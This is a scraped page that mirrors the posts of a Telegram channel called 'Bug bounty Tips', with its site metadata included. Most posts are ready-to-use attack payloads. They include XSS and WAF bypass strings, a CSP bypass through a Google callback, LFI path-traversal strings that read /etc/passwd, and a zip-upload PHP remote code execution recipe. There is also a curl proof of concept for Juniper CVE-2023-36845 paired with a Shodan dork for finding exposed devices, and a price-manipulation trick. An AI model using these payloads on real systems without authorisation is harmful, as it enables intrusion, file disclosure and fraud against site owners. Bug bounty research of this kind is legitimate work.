ar
Feedback
Bug bounty Tips

Bug bounty Tips

الذهاب إلى القناة على Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

إظهار المزيد
6 062
المشتركون
+1324 ساعات
+677 أيام
+32530 أيام
أرشيف المشاركات
\n\nA payload to bypass Akamai WAF\n \nClick Here","datePublished":"2023-09-22T16:43:08Z","dateModified":"2023-09-22T16:43:08Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":619},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/179","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/179","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/179","headline":"https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-imp…","articleBody":"https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-impact/connecting-to-services-via-url-schemes","datePublished":"2023-09-21T11:50:37Z","dateModified":"2023-09-21T11:50:37Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":505},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/178","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/178","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/178","headline":"CSP Protection Bypass (using Google domain) /o/oauth2/revoke?callback=alert(1);console.log","articleBody":"CSP Protection Bypass (using Google domain)\n\n/o/oauth2/revoke?callback=alert(1);console.log","datePublished":"2023-09-21T03:05:20Z","dateModified":"2023-09-21T03:05:20Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":216},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/177","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/177","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/177","headline":"https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet","articleBody":"https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet","datePublished":"2023-09-20T17:15:13Z","dateModified":"2023-09-20T17:15:13Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":201},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/176","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/176","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/176","headline":"Bug Bounty Reminder Don't forget about the element for XSS WAF bypass on Firefox browser. element for XSS WAF bypass on Firefox browser.\n\n\n \n Click Me\n \n\n\nThe can make any HTML element clickable within it.","datePublished":"2023-09-20T17:14:03Z","dateModified":"2023-09-20T17:14:03Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":174},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/175","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/175","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/175","headline":"Check out my company website. Cipherops.tech","articleBody":"Check out my company website. Cipherops.tech","datePublished":"2023-09-20T17:05:04Z","dateModified":"2023-09-20T17:05:04Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":332},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/174","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/174","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/174","headline":"Join my WhatsApp channel on hacking and tech tips https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A","articleBody":"Join my WhatsApp channel on hacking and tech tips https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A","datePublished":"2023-09-20T12:30:11Z","dateModified":"2023-09-20T12:30:11Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":214},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/173","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/173","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/173","headline":"Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845 Nearly 14,000 Juniper devices are affected, as a se…","articleBody":"Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845\n\nNearly 14,000 Juniper devices are affected, as a search on Shodan shows:\n\nDork : title:\"Juniper\" http.favicon.hash:2141724739\n\nPoc:\ncurl -F $'auto_prepend_file=\"/etc/passwd\\n\"' -F 'PHPRC=/dev/fd/0'\n\nHere is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:\nhttps://lnkd.in/gEQrmXev\n\nFor more information:\nhttps://lnkd.in/gRP3uXTm \n\n#hacker_bano_chutiya_nhe","datePublished":"2023-09-20T10:37:49Z","dateModified":"2023-09-20T10:37:49Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":188},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/172","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/172","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/172","headline":"https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-imp…","articleBody":"https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-impact/revealing-hidden-treasures-accessing-internal-files-via-url-scheme","datePublished":"2023-09-20T10:30:34Z","dateModified":"2023-09-20T10:30:34Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":481},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/171","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/171","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/171","headline":"Bug bounty Guide 2023 | Quick Start Your Bug Bounty Journey https://youtu.be/Z1VFoBzJZuA","articleBody":"Bug bounty Guide 2023 | Quick Start Your Bug Bounty Journey \n\nhttps://youtu.be/Z1VFoBzJZuA","datePublished":"2023-09-20T07:40:37Z","dateModified":"2023-09-20T07:40:37Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":172},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/170","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/170","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/170","headline":"#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter with…","articleBody":"#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter with between 8KB to 10MB of random data BEFORE your malicious payload. \n\nMany WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF\n\nuse this website frequently to generate the easy to insert payloads (copy and paste): \n \nhttps://onlinefiletools.com/generate-random-text-file\n\nCredit : ZwinK","datePublished":"2023-09-20T07:40:13Z","dateModified":"2023-09-20T07:40:13Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":156},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/169","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/169","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/169","headline":"OS Command Injection 🕸🔖 Allows an attacker to execute arbitrary operating system (OS) commands on the serve…","articleBody":"OS Command Injection 🕸🔖\n\nAllows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application\n\nleads to fully compromising the application and all its data.\n\nThread 🧵 : 👇\n\nhttps://twitter.com/Aacle_/status/1629700693530640385?s=20","datePublished":"2023-09-20T07:37:34Z","dateModified":"2023-09-20T07:37:34Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":145},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/168","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/168","mainEntityOfPage":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech/posts/168","headline":"Price Manipulation Method If the product price parameter cannot be changed, change the quantity of products.…","articleBody":"Price Manipulation Method \n\nIf the product price parameter cannot be changed, change the quantity of products.\n\nitems[1][quantity]=1 --> 234 € \nitems[1][quantity]=0.1 --> 23.4 € \n\n#bugbountytips #bugbountytip #bugbounty #cybersecurity #ethicalhacking","datePublished":"2023-09-17T15:26:15Z","dateModified":"2023-09-17T15:26:15Z","author":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"publisher":{"@type":"Organization","name":"Bug bounty Tips","url":"https://telemetr.io/ar/channels/1900529051-bugbounty_tech","image":"https://img.telemetr.io/c/24Cqqn/5035464622299262048?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":192},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}}]}
bypass alert ==> alert;[alert][0].call(this,1) #xss #web #bypass #bugbountytips
bypass alert ==> alert;[alert][0].call(this,1) #xss #web #bypass #bugbountytips

1. How to find Origin IP 2. NucleiFuzzer = Nuclei + Paramspider 3. CRLF injection allow => cookie injection in root domain & xss| 4. How to Find XSS in Wide Scope 5. Remote Code Execution | A Story of Simple RCE on Jenkins Instance. 6. Defeat the HttpOnly flag to achieve Account Takeover | RXSS 7. Discovering Login Panels and Detecting SQL Injection with Logsensor 8. Automating web pentesting with jaeles scanner 9. Afrog scanner for bug bounty hunters 10. RCE via Dependency Confusion 11. How to Get Unique Subdomains on Large scope 12. Expose domains over Akamai or Cloudflare with HEDnsExtractor and httpx #bugbountytips

Some filter bypass payload list while hunting for LFi vulnerability →index.php?page=....//....//etc/passwd →index.php?page=..///////..////..//////etc/passwd →index.php?page=/var/www/../../etc/passwd

Bug Bounty Hunting Tip :- If you can upload .zip file on target then: 1. Create a .php file (rce.php) 2. Compress it to a .zip file (file.zip) 3. Upload your .zip file on the vulnerable web application. 4. Trigger your RCE via: ( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )

A nice way to store the payload "><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script> A payload to bypass Akamai WAF <A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

CSP Protection Bypass (using Google domain) /o/oauth2/revoke?callback=alert(1);console.log
CSP Protection Bypass (using Google domain) /o/oauth2/revoke?callback=alert(1);console.log

Bug Bounty Reminder Don't forget about the element for XSS WAF bypass on Firefox browser. Click Me The can make any HTML element clickable within it.

Check out my company website. Cipherops.tech

Join my WhatsApp channel on hacking and tech tips https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A

Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845 Nearly 14,000 Juniper devices are affected, as a search on Shodan shows: Dork : title:"Juniper" http.favicon.hash:2141724739 Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0' Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei: https://lnkd.in/gEQrmXev For more information: https://lnkd.in/gRP3uXTm #hacker_bano_chutiya_nhe

Bug bounty Guide 2023 | Quick Start Your Bug Bounty Journey https://youtu.be/Z1VFoBzJZuA

#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter with between 8KB to 10MB of random data BEFORE your malicious payload. Many WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF use this website frequently to generate the easy to insert payloads (copy and paste): https://onlinefiletools.com/generate-random-text-file Credit : ZwinK

OS Command Injection 🕸🔖 Allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application leads to fully compromising the application and all its data. Thread 🧵 : 👇 https://twitter.com/Aacle_/status/1629700693530640385?s=20

Price Manipulation Method If the product price parameter cannot be changed, change the quantity of products. items[1][quantity]=1 --> 234 € items[1][quantity]=0.1 --> 23.4 € #bugbountytips #bugbountytip #bugbounty #cybersecurity #ethicalhacking